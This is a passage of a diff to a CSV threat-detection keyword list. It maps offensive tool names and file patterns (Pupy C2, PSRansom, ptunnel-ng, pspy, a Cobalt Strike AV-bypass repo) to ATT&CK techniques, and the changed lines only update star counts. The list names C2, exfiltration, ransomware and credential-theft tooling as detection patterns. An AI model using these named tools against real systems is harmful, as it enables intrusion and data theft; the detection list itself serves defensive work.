powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" -"*pspy*psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*pspy32 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*pspy64 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*pspy-build:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*pspy-development:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*pspy-example:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*pspy-master*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*pspy-testing:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy*psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy32 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy64 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy-build:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy-development:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy-example:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy-master*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy-testing:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*PSRansom.ps1*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" "*PSRecon*","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/gfoss/PSRecon","1","1","N/A","N/A","5","465","111","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z" "*psreflect *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" @@ -15337,43 +15505,44 @@ "*ptunnel-ng-x86-dbg.exe*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*ptunnel-server.log*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*Public\dcinst.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" -"*pupy*/checkvm.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*pupy/payload_*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyCmdLoop*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyCredentials.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyDnsCnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyDnsCommandServerHandler*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*pupygen.py *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyKCPSocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyLoaderTemplate.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyOffloadDNS*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyOffloadSocket*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupySocketStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyVirtualStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pupy*/checkvm.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pupy/payload_*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyCmdLoop*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyCredentials.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyDnsCnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyDnsCommandServerHandler*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pupygen.py *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyKCPSocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyLoaderTemplate.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyOffloadDNS*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyOffloadSocket*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupySocketStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyVirtualStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*pureqh/bypassAV*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 